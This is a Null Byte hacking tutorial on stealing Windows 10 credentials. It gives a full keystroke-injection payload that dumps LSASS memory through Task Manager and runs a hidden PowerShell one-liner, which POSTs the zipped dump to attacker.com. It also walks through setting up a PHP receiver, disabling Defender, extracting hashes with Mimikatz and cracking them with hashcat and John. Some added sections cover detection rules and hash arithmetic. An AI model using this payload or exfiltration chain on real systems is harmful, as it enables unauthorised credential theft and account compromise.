
How to Dump NTLM Hashes & Crack Windows Passwords « Null Byte :: WonderHowTo



Windows 10 passwords stored as NTLM hashes (or, more specifically, NT hashes) can be dumped within a few seconds and exfiltrated to an attacker's system. The hashes can then be brute-forced and cracked to reveal the plaintext passwords using a combination of tools, including Mimikatz, ProcDump, John the Ripper and Hashcat.

Let us first discuss the Local Security Authority Subsystem Service, or LSASS, an essential part of the Windows operating system.

LSASS is responsible for enforcing the security policy, handling domain authentication and managing Active Directory. It spawns the processes responsible for authenticating users with NTLM and verifies the validity of logons. Because it is so crucial to the functioning of the operating system, attackers often name malicious executables after the process.

Mimikatz & ProcDump

Mimikatz, created by gentilkiwi, can be used to extract password hashes, Kerberos tickets and PIN codes from Windows 10 memory. It is best known for its ability to extract sensitive credentials from a running Windows computer.

Today, Windows Defender and antivirus software have become increasingly effective at detecting Mimikatz binaries and signatures (shown below).

VirusTotal detection rates for the latest Mimikatz version.

In combination with Mimikatz, hackers now use ProcDump, a standalone executable file designed for administrators to monitor application crashes.

ProcDump is used to create the LSASS dump, which is later moved to an offline Windows 10 computer and analyzed with Mimikatz. This is still an effective technique for extracting credentials from Windows 10 because ProcDump is a signed Microsoft binary and is not flagged by most antivirus software (shown below).

Windows 10 Task Manager can also be used to dump LSASS memory without the help of Mimikatz or ProcDump. Below is an example of a MouseJack payload designed to create and exfiltrate the LSASS dump using only keystroke injection and PowerShell. The attack completes within ten seconds (it is paused at certain points in the demonstration for clarity).

Task Manager is opened with administrative rights from the Run window. The screen goes completely dark for a second because of the User Account Control (UAC) prompt, which prevents the GIF recorder from capturing the screen. Next, the Local Security Authority Process (lsass.exe) is located in the process list and dumped to the %TEMP% folder (the default). A PowerShell one-liner is then executed from the Run window; it compresses the LSASS dump into a ZIP file and sends it to the attacker's server.

At this point, the attacker can use Mimikatz on an offline Windows 10 computer or virtual machine (with no antivirus software installed) to extract the hashed passwords.

Step 1: Make the Keystroke Injection Payload

The keystroke injection payload below can be delivered via MouseJack vulnerabilities or a USB Rubber Ducky.

While the MouseJack vulnerabilities were disclosed a few years ago, tens of millions of keyboards and mice (including Logitech devices) are still believed to be susceptible to keystroke injection. As Marcus Mengs, the creator of P4wnP1, illustrates in his proof-of-concept video, Logitech dongles remain vulnerable to remote attacks.

Comments (REM) have been added to each line of the payload for clarification.

REM 2.5 second delay to give Windows 10 some time to correctly
REM mount the USB Rubber Ducky. This initial delay is not
REM required for MouseJack attacks.
DELAY 2500

REM Open the Run window.
GUI r

REM Give the Run window 1 second to open.
DELAY 1000

REM Type "taskmgr" (i.e., Task Manager) into the Run window.
STRING taskmgr

REM Delay for 0.5 seconds.
DELAY 500

REM The Ctrl + Shift + Enter combination is pressed to trigger
REM the User Account Control (UAC) prompt. This causes
REM taskmgr to open with administrator rights.
CTRL-SHIFT ENTER

REM Allow the UAC prompt to appear. This may take a few seconds
REM on some Windows 10 machines.
DELAY 2500

REM ALT + y combination to accept the UAC prompt.
ALT y

REM Wait a few seconds for Task Manager to fully open with
REM administrator rights. This took (on average) 5.5 seconds in my
REM tests. In some scenarios, with high-end CPUs, this delay
REM can be considerably lower.
DELAY 5500

REM Press the down arrow to move from the toolbar to the
REM list of running background processes.
DOWN

REM Type "local" to jump down and highlight the "Local Security
REM Authority Process" entry.
STRING local

REM SHIFT + F10 combination invokes the right-click context
REM menu.
SHIFT F10

REM Allow 1.2 seconds for the context menu to fully open.
DELAY 1200

REM Press the down arrow four times to highlight the "Create
REM dump file" option.
DOWN
DOWN
DOWN
DOWN

REM Press Enter to select the "Create dump file" option.
ENTER

REM Wait 3.5 seconds for the dump file to be created and saved
REM to the %TEMP% folder.
DELAY 3500

REM Press Enter to select "OK" and close the dump pop-up window.
ENTER

REM ALT + F4 combination to close the Task Manager window.
ALT F4

REM Wait 0.7 seconds for Task Manager to close.
DELAY 700

REM Reopen the Run window.
GUI r

REM Wait 0.7 seconds for the Run window to open.
DELAY 700

REM PowerShell one-liner to compress and exfiltrate the LSASS
REM dump file. Each part of the one-liner is explained in more
REM detail below.
STRING powershell -ep bypass /w 1 /C $t=$env:temp; $l='lsass.DMP'; compress-archive -path $t\$l -destinationpath $t\a.zip; iwr attacker.com/i.php -method POST -infile $t\a.zip

REM Press Enter to execute the PowerShell one-liner.
ENTER

The PowerShell payload consists of several commands chained together with semicolons:

  • powershell -ep bypass /w 1 /C – The ExecutionPolicy (-ep) is set to "bypass" to get PowerShell execution past Windows Defender and some antivirus software. The WindowStyle (/w) is set to "1", which immediately hides the PowerShell pop-up terminal.
  • $t=$env:temp; – The target's temporary folder is stored in the variable $t. Using single-letter variables shortens the overall payload; it is more efficient than typing "C:\Users\%USERNAME%\AppData\Local\Temp" over and over.
  • $l='lsass.DMP'; – The file name lsass.DMP is stored in the variable $l. This file name is set automatically by Task Manager.
  • compress-archive -path $t\$l -destinationpath $t\a.zip; – PowerShell's Compress-Archive cmdlet zips lsass.DMP into the "a.zip" file (-destinationpath).
  • iwr attacker.com/i.php -method POST -infile $t\a.zip – Invoke-WebRequest (iwr) sends a.zip (-infile) to the attacker's server as a POST request. Be sure to change "attacker.com" to the local IP address of the Kali machine or the address of the virtual private server.
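As an added defensive counterpart (example code, not from the article), the three stages the payload walks through each leave distinct host telemetry, and this Python checks constructed Sysmon-style records for them. The allowlist, the sample records and their field values are assumptions made for the example.

```python
"""
Added example (not from the Null Byte article): detection logic for the chain
Step 1 describes (Task Manager reads lsass.exe, lsass.DMP lands in %TEMP%,
PowerShell zips and POSTs it), run over constructed Sysmon-style records.
Event IDs and field names follow Sysmon (10 ProcessAccess, 11 FileCreate,
1 ProcessCreate); every record below is made up for this example.
"""
import re

PROCESS_VM_READ = 0x10  # access right any memory dumper needs on lsass.exe

# Images that routinely open lsass.exe on a healthy host.
# This allowlist is an assumption; build yours from your own baseline.
LSASS_READERS_ALLOWED = {
    r"c:\windows\system32\svchost.exe",
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
}
DUMP_FILE = re.compile(r"\\lsass[^\\]*\.dmp$", re.I)
# "-ep bypass" followed by Compress-Archive or an Invoke-WebRequest upload.
EXFIL_CMD = re.compile(
    r"-ep\s+bypass.*(compress-archive|(iwr|invoke-webrequest)\b.*-infile)", re.I)

SAMPLE_EVENTS = [  # constructed records; the one-liner is the article's own
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\Taskmgr.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 11, "Image": r"C:\Windows\System32\Taskmgr.exe",
     "TargetFilename": r"C:\Users\alice\AppData\Local\Temp\lsass.DMP"},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -ep bypass /w 1 /C $t=$env:temp; $l='lsass.DMP'; "
                    "compress-archive -path $t\\$l -destinationpath $t\\a.zip; "
                    "iwr attacker.com/i.php -method POST -infile $t\\a.zip"},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -File C:\\Scripts\\nightly-backup.ps1"},
]


def detect(events):
    """Return (rule, detail) pairs for records matching the dump-and-exfil chain."""
    alerts = []
    for e in events:
        if e["EventID"] == 10 and e["TargetImage"].lower().endswith(r"\lsass.exe"):
            src = e["SourceImage"].lower()
            # Non-baselined process asking for memory-read rights on lsass.exe.
            if src not in LSASS_READERS_ALLOWED and int(e["GrantedAccess"], 16) & PROCESS_VM_READ:
                alerts.append(("lsass_memory_read", e["SourceImage"]))
        elif e["EventID"] == 11 and DUMP_FILE.search(e["TargetFilename"]):
            alerts.append(("lsass_dump_written", e["TargetFilename"]))
        elif e["EventID"] == 1 and EXFIL_CMD.search(e.get("CommandLine", "")):
            alerts.append(("dump_exfil_commandline", e["Image"]))
    return alerts


if __name__ == "__main__":
    for rule, detail in detect(SAMPLE_EVENTS):
        print(f"{rule:24} {detail}")
```

The svchost record is ignored on both counts (allowlisted and no PROCESS_VM_READ bit), so a tuned allowlist plus the access-mask check keeps the rule quiet on normal hosts.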

Step 2: Intercept the LSASS Dump

Before performing the keystroke injection, a PHP server is required to receive the exfiltrated dump.

The keystroke payload expects a server listening on port 80. For simplicity, this example uses Kali Linux on a local network, where root privileges are already in use. Setting up on a virtual private server likewise requires root to open a listening service on port 80.

Non-Kali users can start with the following command:

  ~$ sudo su

Then create a folder named "phpServer/" using the mkdir command below.

  ~$ mkdir phpServer/

Change into the phpServer/ folder with the cd command.

  ~$ cd phpServer/

Create a file named "i.php" with nano.

  ~$ nano i.php

Paste the PHP script below into nano. When that is done, press Ctrl + x, then y, then Enter to save and exit nano.

This simple PHP script receives ZIP files and does not need to be modified in any way to function. When the Windows 10 target sends a .zip, the PHP server stores the data using the current time as the file name.

Start the PHP server with the command php -S 0.0.0.0:80. The -S tells PHP to start its built-in web server, while 0.0.0.0 tells it to listen on every IPv4 interface.

  ~$ php -S 0.0.0.0:80

PHP 7.3.0-2 Development Server started
Listening on http://0.0.0.0:80
Document root is /root/phpServer
Press Ctrl-C to quit.

Step 3: Extract the Hash with Mimikatz

After the ZIP is received, move it to a Windows 10 computer or virtual machine. Extract it to find the lsass.DMP file.

Be sure to disable Windows Defender and other security features before downloading Mimikatz. Open the Start menu and search for "virus".

Click on "Virus and threat protection settings" and disable all available options. Alternatively, a virtual machine without Windows Defender or SmartScreen can be set up for working with Mimikatz.

At the time of this writing, the latest version of Mimikatz is 2.2.0. Open a web browser and navigate to the GitHub repository to find the latest "mimikatz_trunk.zip" release.

After unpacking the Mimikatz ZIP, open a PowerShell terminal. Use the following command to run mimikatz.exe; the mimikatz prompt will appear.

  PS C:\> & "C:\Users\$env:username\PATH\TO\MIMIKATZ\x64\mimikatz.exe"

  .#####.   mimikatz 2.2.0 (x64) #18362 Aug 13 2019 01:35:04
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz #

The following sekurlsa::minidump command loads lsass.DMP into Mimikatz.

  mimikatz # sekurlsa::minidump C:\Users\%USERNAME%\Documents\lsass.DMP

Switch to MINIDUMP : 'C:\Users\tokyoneon\Documents\lsass.DMP'

Then use the sekurlsa::logonPasswords command to extract the credential hashes. Since Windows 8, plaintext passwords are no longer stored in memory without further modification of the operating system. But that doesn't mean Windows 10 hashes can't be brute-forced and cracked easily. On line 12 we find the password hash in NTLM format.

  mimikatz # sekurlsa::logonPasswords

Opening : 'C:\Users\tokyoneon\Documents\lsass.DMP' file for minidump...

1  Authentication Id : 0 ; 102597 (00000000:000190c5)
2  Session           : Interactive from 1
3  User Name         : tokyoneon
4  Domain            : MSEDGEWIN10
5  Logon Server      : MSEDGEWIN10
6  Logon Time        : 5/31/2019 1:01:05 AM
7  SID               : S-1-5-21-3859058339-3768143778-240673529-1000
8          msv :
9           [00000003] Primary
10          * Username   : tokyoneon
11          * Domain     : MSEDGEWIN10
12          * NTLM       : 7b5e40a5b7b17972ad793b9fc868a66e
13          * SHA1       : 6076b8f4d982b55097f910b3fb5a81c801954406
14         tspkg :
15         wdigest :
16          * Username   : tokyoneon
17          * Domain     : MSEDGEWIN10
18          * Password   : (null)
19         kerberos :
20          * Username   : tokyoneon
21          * Domain     : MSEDGEWIN10
22          * Password   : (null)
23         ssp :
24         credman :

25 Authentication Id : 0 ; 102306 (00000000:00018fa2)
26 Session           : Interactive from 1
27 User Name         : tokyoneon
28 Domain            : MSEDGEWIN10
29 Logon Server      : MSEDGEWIN10
30 Logon Time        : 5/31/2019 1:01:05 AM
31 SID               : S-1-5-21-3859058339-3768143778-240673529-1000
32         msv :
33          [00000003] Primary
34          * Username   : tokyoneon
35          * Domain     : MSEDGEWIN10
36          * NTLM       : 7b5e40a5b7b17972ad793b9fc868a66e
37          * SHA1       : 6076b8f4d982b55097f910b3fb5a81c801954406
38         tspkg :
39         wdigest :
40          * Username   : tokyoneon
41          * Domain     : MSEDGEWIN10
42          * Password   : (null)
43         kerberos :
44          * Username   : tokyoneon
45          * Domain     : MSEDGEWIN10
46          * Password   : (null)
47         ssp :
48         credman :

49 Authentication Id : 0 ; 74052 (00000000:00012144)
50 Session           : Service from 0
51 User Name         : sshd_server
52 Domain            : MSEDGEWIN10
53 Logon Server      : MSEDGEWIN10
54 Logon Time        : 5/31/2019 1:01:04 AM
55 SID               : S-1-5-21-3859058339-3768143778-240673529-1003
56         msv :
57          [00000003] Primary
58          * Username   : sshd_server
59          * Domain     : MSEDGEWIN10
60          * NTLM       : 8d0a16cfc061c3359db455d00ec27035
61          * SHA1       : 94bd2df8ae5cadbbb5757c3be01dd40c27f9362f
62         tspkg :
63         wdigest :
64          * Username   : sshd_server
65          * Domain     : MSEDGEWIN10
66          * Password   : (null)
67         kerberos :
68          * Username   : sshd_server
69          * Domain     : MSEDGEWIN10
70          * Password   : (null)
71         ssp :
72         credman :
mimikatz # 
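The NTLM value on line 12 is an unsalted MD4 digest of the UTF-16LE password, which is why both of tokyoneon's logon sessions show byte-identical hashes and why one cracking run covers every account sharing a password. This added Python (not from the article or Mimikatz) reproduces the derivation; MD4 is implemented in pure Python because hashlib omits it on many modern builds.

```python
"""
Added example (not from the Null Byte article or Mimikatz): how the "NTLM"
value Mimikatz prints is derived. NT hash = MD4(UTF-16LE(password)), no salt.
"""
import struct

MASK32 = 0xFFFFFFFF


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & MASK32


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 digest of `data`, implemented in pure Python."""
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    # Padding: 0x80, zeros up to 56 mod 64, then the bit length as 64-bit LE.
    bit_len = len(data) * 8
    data += b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", bit_len)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(data), 64):
        x = struct.unpack("<16I", data[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        # Round 1: words in order, shifts 3/7/11/19.
        for i in range(16):
            t = (aa + f(bb, cc, dd) + x[i]) & MASK32
            aa, bb, cc, dd = dd, _rotl(t, (3, 7, 11, 19)[i % 4]), bb, cc
        # Round 2: words 0,4,8,12,1,5,..., shifts 3/5/9/13.
        for i in range(16):
            t = (aa + g(bb, cc, dd) + x[(i % 4) * 4 + i // 4] + 0x5A827999) & MASK32
            aa, bb, cc, dd = dd, _rotl(t, (3, 5, 9, 13)[i % 4]), bb, cc
        # Round 3: bit-reversed word order, shifts 3/9/11/15.
        order = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
        for i in range(16):
            t = (aa + h(bb, cc, dd) + x[order[i]] + 0x6ED9EBA1) & MASK32
            aa, bb, cc, dd = dd, _rotl(t, (3, 9, 11, 15)[i % 4]), bb, cc
        a, b, c, d = ((a + aa) & MASK32, (b + bb) & MASK32,
                      (c + cc) & MASK32, (d + dd) & MASK32)
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> str:
    """NT hash in the hex form Mimikatz and hashcat -m 1000 use."""
    return md4(password.encode("utf-16-le")).hex()


if __name__ == "__main__":
    # No salt: the same password yields the same hash on every machine.
    print(nt_hash(""))          # empty password: 31d6cfe0d16ae931b73c59d7e0c089c0
    print(nt_hash("password"))  # 8846f7eaee8fb117ad06bdd830b7586c
```

Feeding nt_hash() the password recovered in Step 4 should reproduce the Hash.Target value hashcat prints there.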

Step 4: Brute-Forcing the NTLM Hash

Research suggests that most passwords are between six and eight characters, usually consisting of six letters and ending with two digits.

As a small experiment, I wanted to know how long it would take a Raspberry Pi 3B+, a common Intel i7 CPU, and a GeForce GTX GPU to crack the same hash of a password consisting of six random letters followed by two random digits (e.g., Nchfyr56).

1. Brute-Force with Raspberry Pi 3B+ (John the Ripper)

After installing John the Ripper on a Raspberry Pi 3B+, the password (nchfyr56) was guessed in just over five hours. Since most passwords are eight characters long, mask attacks with a Raspberry Pi are surprisingly practical for brute-forcing NTLM hashes.


  ~$ john --mask='?l?l?l?l?l?l?d?d' --format=NT /root/Desktop/hash

Using default input encoding: UTF-8
Loaded 1 password hash (NT [MD4 32/32])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status

nchfyr56         (?)

1g 0:05:19:24 DONE (2018-06-22 16:36) 0.000052g/s 1389Kp/s 1389Kc/s 1389KC/s achfyr56..zuhfyr56
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed

2. Brute-Force with Intel i7 CPU (Hashcat CPU)

The same NTLM hash took only three minutes to crack with an older Intel i7, though exhausting the full keyspace would have taken an estimated fifteen minutes.

  ~$ hashcat /tmp/hash -m 1000 -a 3 ?l?l?l?l?l?l?d?d

hashcat (v5.1.0) starting...

OpenCL Platform #1: The pocl project
===========================================
* Device #1: pthread-Intel(R) Core(TM) i7-3537U CPU @ 2.00GHz, 2048/5809 MB allocatable, 4MCU

7b5e40a5b7b17972ad793b9fc868a66e:nchfyr56

Session..........: hashcat
Status...........: Cracked
Hash.Type........: NTLM
Hash.Target......: 7b5e40a5b7b17972ad793b9fc868a66e
Time.Started.....: Fri Aug 31 21:48:25 2019 (2 mins, 50 secs)
Time.Estimated...: Fri Aug 31 21:51:15 2019 (0 secs)
Guess.Mask.......: ?l?l?l?l?l?l?d?d [8]
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 35719.8 kH/s (7.23ms) @ Accel:512 Loops:128 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 6049366016/30891577600 (19.58%)
Rejected.........: 0/6049366016 (0.00%)
Restore.Point....: 344064/1757600 (19.58%)
Restore.Sub.#1...: Salt:0 Amplifier:896-1024 Iteration:0-128
Candidates.#1....: hstrxp56 -> tjoqxn56

Started: Fri Aug 31 21:48:09 2019
Stopped: Fri Aug 31 21:51:16 2019

3. Brute-Force with GeForce GTX GPU (Hashcat GPU)

The NTLM hash was cracked within a second. This was achieved with a fairly low-end GeForce GTX 1060 GPU.

  ~$ hashcat /tmp/hash -m 1000 -a 3 ?l?l?l?l?l?l?d?d

OpenCL Platform #1: NVIDIA Corporation
=============================================
* Device #1: GeForce GTX 1060 3GB, 754/3018 MB allocatable, 9MCU

7b5e40a5b7b17972ad793b9fc868a66e:nchfyr56

Session..........: hashcat
Status...........: Cracked
Hash.Type........: NTLM
Hash.Target......: 7b5e40a5b7b17972ad793b9fc868a66e
Time.Started.....: Fri Aug 31 03:00:38 2019 (0 secs)
Time.Estimated...: Fri Aug 31 03:00:38 2019 (0 secs)
Guess.Mask.......: ?l?l?l?l?l?l?d?d [8]
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 4658.0 MH/s (7.06ms) @ Accel:128 Loops:32 Thr:1024 Vec:1
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 1094713344/30891577600 (3.54%)
Rejected.........: 0/1094713344 (0.00%)
Restore.Point....: 0/1757600 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:896-928 Iteration:0-32
Candidates.#1....: hstera12 -> eusind80
Hardware.Mon.#1..: Temp: 34c Fan: 25% Util: 92% Core:1898MHz Mem:3802MHz Bus:16

Started: Fri Aug 31 03:00:34 2019
Stopped: Fri Aug 31 03:00:39 2019

When testing a stronger password of eight letters and two digits (for example, Psjhfhdd48) on the GPU, the hash was cracked within twenty-five minutes.

  ~$ hashcat /tmp/hash2 -w 4 -O -m 1000 -a 3 ?u?l?l?l?l?l?l?l?d?d

OpenCL Platform #1: NVIDIA Corporation
=============================================
* Device #1: GeForce GTX 1060 3GB, 754/3018 MB allocatable, 9MCU

30346ad7463810ea4d5a58090611e368:Psjhfhdd48

Session..........: hashcat
Status...........: Cracked
Hash.Type........: NTLM
Hash.Target......: 30346ad7463810ea4d5a58090611e368
Time.Started.....: Fri Aug 31 03:19:11 2019 (23 mins, 28 secs)
Time.Estimated...: Fri Aug 31 03:42:39 2019 (0 secs)
Guess.Mask.......: ?u?l?l?l?l?l?l?l?d?d [10]
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 12459.0 MH/s (97.89ms) @ Accel:256 Loops:676 Thr:1024 Vec:1
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 17567648317440/20882706457600 (84.13%)
Rejected.........: 0/17567648317440 (0.00%)
Restore.Point....: 25985286144/30891577600 (84.12%)
Restore.Sub.#1...: Salt:0 Amplifier:0-676 Iteration:0-676
Candidates.#1....: Mackuobd48 -> Xzkmatgd48
Hardware.Mon.#1..: Temp: 73c Fan: 50% Util:100% Core:1835MHz Mem:3802MHz Bus:16

Started: Fri Aug 31 03:19:09 2019
Stopped: Fri Aug 31 03:42:40 2019

Even stronger NTLM hashes (eight letters + four digits) needed an estimated two days to crack.

  ~$ hashcat /tmp/hash3 -w 4 -O -m 1000 -a 3 ?u?l?l?l?l?l?l?l?d?d?d?d

Session..........: hashcat
Status...........: Running
Hash.Type........: NTLM
Hash.Target......: aa110854b242ed77c07be54e62611464
Time.Started.....: Fri Aug 31 03:43:40 2019 (45 secs)
Time.Estimated...: Sun Sep  2 01:48:09 2019 (1 day, 22 hours)
Guess.Mask.......: ?u?l?l?l?l?l?l?l?d?d?d?d [12]
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 12589.8 MH/s (96.68ms) @ Accel:256 Loops:676 Thr:1024 Vec:1
Recovered........: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts
Progress.........: 559804317696/2088270645760000 (0.03%)
Rejected.........: 0/559804317696 (0.00%)
Restore.Point....: 828112896/3089157760000 (0.03%)
Restore.Sub.#1...: Salt:0 Amplifier:0-676 Iteration:0-676
Candidates.#1....: Maecdesr2000 -> Xzoejixr2000
Hardware.Mon.#1..: Temp: 65c Fan: 38% Util:100% Core:1847MHz Mem:3802MHz Bus:16

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =>

For attackers with dedicated brute-force rigs, two days is very realistic. With a cluster of high-end GPUs, an attacker can quickly crack hashes drawn from an even wider keyspace.
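The arithmetic behind the Step 4 results, as an added example (not from the article or hashcat): a mask enumerates the product of its charset sizes, and the worst-case time is keyspace divided by hash rate. The rates are the Speed.#1 values reported above; the keyspaces reproduce hashcat's Progress denominators, and the function also handles hashcat's ?s and ?a charsets, which the article does not use.

```python
"""
Added example (not from the Null Byte article or hashcat): keyspace size and
time-to-exhaust for the hashcat masks used in Step 4, at the rates reported.
"""
CHARSET_SIZES = {"l": 26, "u": 26, "d": 10, "s": 33, "a": 95}  # hashcat built-ins


def mask_keyspace(mask: str) -> int:
    """Candidates enumerated by a hashcat -a 3 mask such as '?l?l?l?l?l?l?d?d'."""
    tokens = mask.split("?")
    if tokens[0] != "" or not all(t in CHARSET_SIZES for t in tokens[1:]):
        raise ValueError(f"unsupported mask: {mask!r}")
    total = 1
    for t in tokens[1:]:
        total *= CHARSET_SIZES[t]
    return total


def seconds_to_exhaust(mask: str, rate_hps: float) -> float:
    """Worst-case time to try every candidate at `rate_hps` hashes per second."""
    return mask_keyspace(mask) / rate_hps


def fmt_duration(seconds: float) -> str:
    days, rem = divmod(int(seconds), 86400)
    hours, rem = divmod(rem, 3600)
    minutes, secs = divmod(rem, 60)
    return f"{days}d {hours:02d}h {minutes:02d}m {secs:02d}s"


# (label, mask, hashes/second) taken from the article's john and hashcat output.
ARTICLE_RUNS = [
    ("Raspberry Pi 3B+ (john)",  "?l?l?l?l?l?l?d?d",         1_389_000),
    ("Intel i7-3537U (hashcat)", "?l?l?l?l?l?l?d?d",         35_719_800),
    ("GTX 1060, 8 chars",        "?l?l?l?l?l?l?d?d",         4_658_000_000),
    ("GTX 1060, 10 chars",       "?u?l?l?l?l?l?l?l?d?d",     12_459_000_000),
    ("GTX 1060, 12 chars",       "?u?l?l?l?l?l?l?l?d?d?d?d", 12_589_800_000),
]

if __name__ == "__main__":
    for label, mask, rate in ARTICLE_RUNS:
        print(f"{label:26} {mask:26} {mask_keyspace(mask):>19,d}  "
              f"{fmt_duration(seconds_to_exhaust(mask, rate))}")
```

Each extra letter multiplies the work by 26 and each extra digit by 10, which is why the jump from eight to twelve characters turns one second into two days on the same card.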

Until next time, follow me on Twitter @tokyoneon_ and GitHub. And as always, leave a comment below or send me a message if you have any questions.

Don't miss it: Getting started hacking Windows 10

Cover photo by Alex Kotliarskyi / Unsplash; Screenshots from tokyoneon / Null Byte



